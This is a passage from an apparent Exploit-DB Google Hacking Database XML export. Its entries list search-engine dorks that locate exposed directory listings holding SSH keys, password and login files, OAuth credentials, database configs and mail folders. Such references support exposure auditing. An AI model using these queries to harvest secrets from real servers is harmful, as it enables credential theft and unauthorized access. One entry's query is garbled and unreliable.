# Result of this dorks contains Sensitive Directories with juicy ssh keys.
# POC in attachment
# Thanks!
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;id_rsa.pub&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;id_rsa.pub&quot;</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Sid Joshi</author>
</entry>
<entry>
<id>7557</id>
<link>https://www.exploit-db.com/ghdb/7557</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;infn.it&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;infn.it&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;infn.it&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;infn.it&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7263</id>
<link>https://www.exploit-db.com/ghdb/7263</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;irc.log&quot; | &quot;irc.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;irc.log&quot; | &quot;irc.logs&quot;
# Files Containing Juicy Info
# Date: 16/08/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;irc.log&quot; | &quot;irc.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;irc.log&quot; | &quot;irc.logs&quot;</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7920</id>
<link>https://www.exploit-db.com/ghdb/7920</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;java.log&quot; | &quot;java.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;java.log&quot; | &quot;java.logs&quot;
# Files Containing Juicy Info
# Date: 26/01/2022
# Exploit Author: Mridupawan Bordoloi
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;java.log&quot; | &quot;java.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;java.log&quot; | &quot;java.logs&quot;</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Mridupawan Bordoloi</author>
</entry>
<entry>
<id>6070</id>
<link>https://www.exploit-db.com/ghdb/6070</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;jsapi_ticket.json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;jsapi_ticket.json&quot;
Description: This Google dork lists out sensitive jsapi data for a web
server
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;jsapi_ticket.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;jsapi_ticket.json&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7584</id>
<link>https://www.exploit-db.com/ghdb/7584</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;kde-l10n-de&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;kde-l10n-de&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;kde-l10n-de&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;kde-l10n-de&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6013</id>
<link>https://www.exploit-db.com/ghdb/6013</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;keys.asc&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;keys.asc&quot;
# Juicy information and sensitive directories.
# Date: 5/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;keys.asc&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;keys.asc&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5972</id>
<link>https://www.exploit-db.com/ghdb/5972</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;keys.ini&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;keys.ini&quot;
# Juicy information located into keys.ini files. Various Windows
activation keys categorized by #OS|Type|Brand|Key.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;keys.ini&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;keys.ini&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7948</id>
<link>https://www.exploit-db.com/ghdb/7948</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;keystore.jks&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;keystore.jks&quot;
# Files Containing Juicy Info
# Date:22/06/2022
# Exploit Author: Simone Gasparato</textualDescription>
<query>intitle:&quot;index of&quot; &quot;keystore.jks&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;keystore.jks&quot;</querystring>
<edb></edb>
<date>2022-06-22</date>
<author>Simone Gasparato</author>
</entry>
<entry>
<id>4918</id>
<link>https://www.exploit-db.com/ghdb/4918</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;laravel.log&quot; | &quot;main.yaml&quot; | &quot;server.cfg&quot;</shortDescription>
<textualDescription>Juicy info which sometimes gives you good DB queries or login information
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;laravel.log&quot; | &quot;main.yaml&quot; | &quot;server.cfg&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;laravel.log&quot; | &quot;main.yaml&quot; | &quot;server.cfg&quot;</querystring>
<edb></edb>
<date>2018-08-14</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7558</id>
<link>https://www.exploit-db.com/ghdb/7558</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;lngs.infn.it &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;lngs.infn.it &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;lngs.infn.it &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;lngs.infn.it &quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6029</id>
<link>https://www.exploit-db.com/ghdb/6029</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;local.json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;local.json&quot;
Description: This google dork lists out local configuration settings for a
web server.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;local.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;local.json&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7299</id>
<link>https://www.exploit-db.com/ghdb/7299</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;local_settings.py&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;local_settings.py&quot;
# Files Containing Juicy Info
# Date:06/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;local_settings.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;local_settings.py&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6195</id>
<link>https://www.exploit-db.com/ghdb/6195</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;log.bak&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;log.bak&quot;
Description: This google dorks lists out sensitive backup log files web servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;log.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;log.bak&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6047</id>
<link>https://www.exploit-db.com/ghdb/6047</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;login.docx&quot;</shortDescription>
<textualDescription>Find sensitive information using this dork.
DORK: intitle:&quot;index of&quot; &quot;login.docx&quot;
~ Irshad Ahamed
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;login.docx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;login.docx&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>8248</id>
<link>https://www.exploit-db.com/ghdb/8248</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;login.php.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;login.php.txt&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;login.php.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;login.php.txt&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>6015</id>
<link>https://www.exploit-db.com/ghdb/6015</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;login.txt&quot;</shortDescription>
<textualDescription>Exposes the login.txt file containing login credentials
-Juveria Banu
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;login.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;login.txt&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>6012</id>
<link>https://www.exploit-db.com/ghdb/6012</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Logins.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;Logins.txt&quot;
# Juicy information and sensitive directories including in many case, user
names and passwords.
# Date: 5/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Logins.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Logins.txt&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7447</id>
<link>https://www.exploit-db.com/ghdb/7447</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;logs&quot;
# Files Containing Juicy Info
# Date:14/10/2021
# Exploit Author: Prakash Ganesh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;logs&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Prakash Ganesh</author>
</entry>
<entry>
<id>4016</id>
<link>https://www.exploit-db.com/ghdb/4016</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;mail&quot; &quot;Inbox&quot; &quot;Sent&quot;</shortDescription>
<textualDescription>This Dork reveal the folders of &quot;Inbox&quot; and &quot;Sent&quot; for mail servers. Enjoy.</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;mail&quot; &quot;Inbox&quot; &quot;Sent&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;mail&quot; &quot;Inbox&quot; &quot;Sent&quot;</querystring>
<edb></edb>
<date>2015-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5647</id>
<link>https://www.exploit-db.com/ghdb/5647</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mail.log&quot;</shortDescription>
<textualDescription>Files containing juciy info:
intitle:&quot;index of&quot; &quot;mail.log&quot;
intitle:&quot;index of&quot; &quot;mail.err&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mail.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mail.log&quot;</querystring>
<edb></edb>
<date>2019-11-20</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7848</id>
<link>https://www.exploit-db.com/ghdb/7848</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;man.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;man.sh&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;man.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;man.sh&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6049</id>
<link>https://www.exploit-db.com/ghdb/6049</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;manage.py&quot;</shortDescription>
<textualDescription>The configuration file of websites using DJANGO (Python) as backend.
DORK: intitle:&quot;index of&quot; &quot;manage.py&quot;
~ Irshad Ahamed
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;manage.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;manage.py&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Irshad Ahamed</author>
</entry>
<entry>
<id>7594</id>
<link>https://www.exploit-db.com/ghdb/7594</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;master01&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;master01&quot;
# Files Containing Juicy Info
# Date:03/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;master01&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;master01&quot;</querystring>
<edb></edb>
<date>2021-11-04</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7589</id>
<link>https://www.exploit-db.com/ghdb/7589</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;metin&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;metin&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;metin&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;metin&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7539</id>
<link>https://www.exploit-db.com/ghdb/7539</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mips32el-nf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;mips32el-nf&quot;
# Files Containing Juicy Info
# Date:30/10/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mips32el-nf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mips32el-nf&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7586</id>
<link>https://www.exploit-db.com/ghdb/7586</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mirror.koddos.net&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;mirror.koddos.net&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mirror.koddos.net&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mirror.koddos.net&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7491</id>
<link>https://www.exploit-db.com/ghdb/7491</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mongod*&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;mongod*&quot;
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Tanvir Rayhan</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mongod*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mongod*&quot;</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Tanvir Rayhan</author>
</entry>
<entry>
<id>7362</id>
<link>https://www.exploit-db.com/ghdb/7362</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mongod.conf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;mongod.conf&quot;
# Files Containing Juicy Info
# Date:30/09/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mongod.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mongod.conf&quot;</querystring>
<edb></edb>
<date>2021-10-01</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7745</id>
<link>https://www.exploit-db.com/ghdb/7745</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;msadcs.dll &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;msadcs.dll &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;msadcs.dll &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;msadcs.dll &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6073</id>
<link>https://www.exploit-db.com/ghdb/6073</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mvn-settings.xml&quot;</shortDescription>
<textualDescription>This Google dork finds Maven settings files on web servers.
intitle:&quot;index of&quot; &quot;mvn-settings.xml&quot;
--
BlackBelu.ga
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mvn-settings.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mvn-settings.xml&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>BlackBelu.ga</author>
</entry>
<entry>
<id>6569</id>
<link>https://www.exploit-db.com/ghdb/6569</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mysql.log&quot; | &quot;mysql.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;mysql.log&quot; | &quot;mysql.logs&quot;
# Files containing juicy info.
# Date: 24/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mysql.log&quot; | &quot;mysql.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mysql.log&quot; | &quot;mysql.logs&quot;</querystring>
<edb></edb>
<date>2020-09-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5817</id>
<link>https://www.exploit-db.com/ghdb/5817</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mysql.properties&quot;</shortDescription>
<textualDescription>This google dork gives us the mysq properties and sensitive details of
misconfigured servers.
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mysql.properties&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mysql.properties&quot;</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>7389</id>
<link>https://www.exploit-db.com/ghdb/7389</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;mysql.yaml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;mysql.yaml&quot;
# Files Containing Juicy Info
# Date: 04/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of&quot; &quot;mysql.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;mysql.yaml&quot;</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Suman Das</author>
</entry>
<entry>
<id>8235</id>
<link>https://www.exploit-db.com/ghdb/8235</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;nginx.conf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;nginx.conf&quot;
# Files Containing Juicy Info
# Date: 11/09/2023
# Exploit Momin Monis</textualDescription>
<query>google dork give nginx.conf file</query>
<querystring>https://www.google.com/search?q=google dork give nginx.conf file</querystring>
<edb></edb>
<date>2023-09-11</date>
<author>Momin Monis</author>
</entry>
<entry>
<id>7716</id>
<link>https://www.exploit-db.com/ghdb/7716</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;node.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;node.js&quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;node.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;node.js&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>8243</id>
<link>https://www.exploit-db.com/ghdb/8243</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;npm-debug.log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;npm-debug.log&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;npm-debug.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;npm-debug.log&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>6030</id>
<link>https://www.exploit-db.com/ghdb/6030</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;oauth-credentials.json&quot;</shortDescription>
<textualDescription>Dork:
intitle:&quot;index of&quot; &quot;oauth-credentials.json&quot;
intitle:&quot;index of&quot; &quot;oauth.json&quot;
Description: This google dork lists oauth credentials for a webserver.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;oauth-credentials.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;oauth-credentials.json&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7562</id>
<link>https://www.exploit-db.com/ghdb/7562</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;oxid-esales&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;oxid-esales&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;oxid-esales&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;oxid-esales&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7538</id>
<link>https://www.exploit-db.com/ghdb/7538</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;Packages.gz&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;Packages.gz&quot;
# Files Containing Juicy Info
# Date:30/10/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;Packages.gz&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;Packages.gz&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5986</id>
<link>https://www.exploit-db.com/ghdb/5986</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;parameters.yml.test&quot; OR &quot;parameters.yml.dist&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;parameters.yml.test&quot; OR
&quot;parameters.yml.dist&quot;
# Juicy information and sensitive directories including mostly secret
tokens, user names and some times passwords.
# Date: 1/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;parameters.yml.test&quot; OR &quot;parameters.yml.dist&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;parameters.yml.test&quot; OR &quot;parameters.yml.dist&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7670</id>
<link>https://www.exploit-db.com/ghdb/7670</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;particle.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;particle.js&quot;
# Files Containing Juicy Info
# Date:7/11/2021
# Exploit Author: Priyanshu Choudhary</textualDescription>
<query>intitle:&quot;index of&quot; &quot;particle.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;particle.js&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Priyanshu Choudhary</author>
</entry>
<entry>
<id>8217</id>
<link>https://www.exploit-db.com/ghdb/8217</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;pass.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;pass.txt&quot;
# Files Containing Juicy Info
# Date: 17/07/2023
# Exploit Author: Aashiq Ahamed</textualDescription>
<query>intitle:&quot;index of&quot; &quot;pass.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;pass.txt&quot;</querystring>
<edb></edb>
<date>2023-07-17</date>
<author>Aashiq Ahamed</author>
</entry>
<entry>
<id>7427</id>
<link>https://www.exploit-db.com/ghdb/7427</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;passwords&quot; gov</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;passwords&quot; gov
# Files Containing Juicy Info
# Date:11/10/2021
# Exploit Author: Syed Sadam</textualDescription>
<query>intitle:&quot;index of&quot; &quot;passwords&quot; gov</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;passwords&quot; gov</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Syed Sadam</author>
</entry>
<entry>
<id>5772</id>
<link>https://www.exploit-db.com/ghdb/5772</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;php.ini&quot;</shortDescription>
<textualDescription>Files Containing Juicy info:
intitle:&quot;index of&quot; &quot;php.ini&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;php.ini&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;php.ini&quot;</querystring>
<edb></edb>
<date>2020-03-05</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6527</id>
<link>https://www.exploit-db.com/ghdb/6527</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;phpmyadmin.sql&quot;</shortDescription>
<textualDescription>Files containing Juicy info:
intitle:&quot;index of&quot; &quot;phpmyadmin.sql&quot;
BR,
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;phpmyadmin.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;phpmyadmin.sql&quot;</querystring>
<edb></edb>
<date>2020-09-09</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>7580</id>
<link>https://www.exploit-db.com/ghdb/7580</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;pkgs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;pkgs&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;pkgs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;pkgs&quot;</querystring>
<edb></edb>
